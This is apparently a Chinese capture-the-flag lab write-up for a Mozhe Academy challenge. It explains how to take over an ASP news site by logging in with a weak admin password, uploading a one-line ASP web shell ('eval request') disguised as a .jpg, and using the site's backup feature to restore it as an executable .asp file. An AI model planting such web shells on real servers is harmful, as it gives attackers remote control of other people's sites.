WebShell 文件上传漏洞分析溯源(第5题)-墨者学院

1.简介

这是一个 ASP 新闻发布站点,在一些老旧的公司官网可能还存在这种漏洞,所以也是有必要学习一下的。

2.弱密码

打开之后是一个新闻页面,后台路径很明显,那么就直接后台弱密码登陆了。登录之后主要功能为:发布文章,数据备份。我们今天就是要利用发布文章和数据备份两个功能结合起来进行 Getshell

3.木马

准备好一个 ASP 一句话木马,然后后缀名改为 .jpg

<%eval request("chopper") %>

然后在添加文章栏目上传这张图片马,会得到图片马的路径,如下:
WebShell 文件上传漏洞分析溯源(第5题)-墨者学院
然后在数据备份栏目,备份刚才的那张图片,将图片还原为 ASP 木马文件。
WebShell 文件上传漏洞分析溯源(第5题)-墨者学院
备份成功之后将会得到一句话木马的路径,接下来连接菜刀或者蚁剑上吧~
WebShell 文件上传漏洞分析溯源(第5题)-墨者学院

4.分析

这道题主要就是利用了数据备份功能,将图片马后缀名改为了可执行的 asp 文件,相当于是在服务器层面帮我们修改了文件后缀。

发表评论

电子邮件地址不会被公开。必填项已用 * 标注